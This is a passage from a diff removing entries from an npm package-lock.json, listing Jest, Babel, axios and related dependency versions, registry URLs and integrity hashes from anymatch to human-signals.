"https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "node_modules/axios": { - "version": "1.6.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz", - "integrity": "sha512-EZ1DYihju9pwVB+jg67ogm+Tmqc6JmhamRN6I4Zt8DfZu5lbcQGw3ozH9lFejSJgs/ibaef3A9PMXPLeefFGJg==", - "dependencies": { - "follow-redirects": "^1.15.0", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - } - }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.21.9", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.21.9.tgz", - "integrity": "sha512-M0MFoZzbUrRU4KNfCrDLnvyE7gub+peetoTid3TBIqtunaDJyXlwhakT+/VkvSXcfIzFfK/nkCs4nmyTmxdNSg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001503", - "electron-to-chromium": "^1.4.431", - "node-releases": "^2.0.12", - "update-browserslist-db": "^1.0.11" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001515", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001515.tgz", - "integrity": "sha512-eEFDwUOZbE24sb+Ecsx3+OvNETqjWIdabMy52oOkIgcUtAsQifjUG9q4U9dgTHJM2mfk4uEPxc0+xuFdJ629QA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.8.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.8.0.tgz", - "integrity": "sha512-eXTggHWSooYhq49F2opQhuHWgzucfF2YgODK4e1566GQs5BIfP30B0oenwBJHfWxAs2fyPB1s7Mg949zLf61Yw==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.4.3.tgz", - "integrity": "sha512-ofrBgwpPhCD85kMKtE9RYFFq6OC1A89oW2vvgWZNCwxrUpRUILopY7lsYyMDSjc8g6U6aiO0Qubg6r4Wgt5ZnA==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.455", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.455.tgz", - "integrity": "sha512-8tgdX0Odl24LtmLwxotpJCVjIndN559AvaOtd67u+2mo+IDsgsTF580NB+uuDCqsHw8yFg53l5+imFV9Fw3cbA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-XEdDLonERCU1n9uR56/Stx9OqojaLAQtZf9PrCHH9Hl8YXiEIka3H4NXJ3NOIBmQJTg7+j7buh34PMHfJujc8g==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.6.1", - "@types/node": "*", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==", - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/RubenVerborgh" - } - ], - "engines": { - "node": ">=4.0" - }, - "peerDependenciesMeta": { - "debug": { - "optional": true - } - } - }, - "node_modules/form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/glob": { - "version": "7.2.3", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", - "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.1.1", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.11", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", - "dev": true - }, - "node_modules/has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.1" - }, - "engines": { - "node": ">= 0.4.0" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": 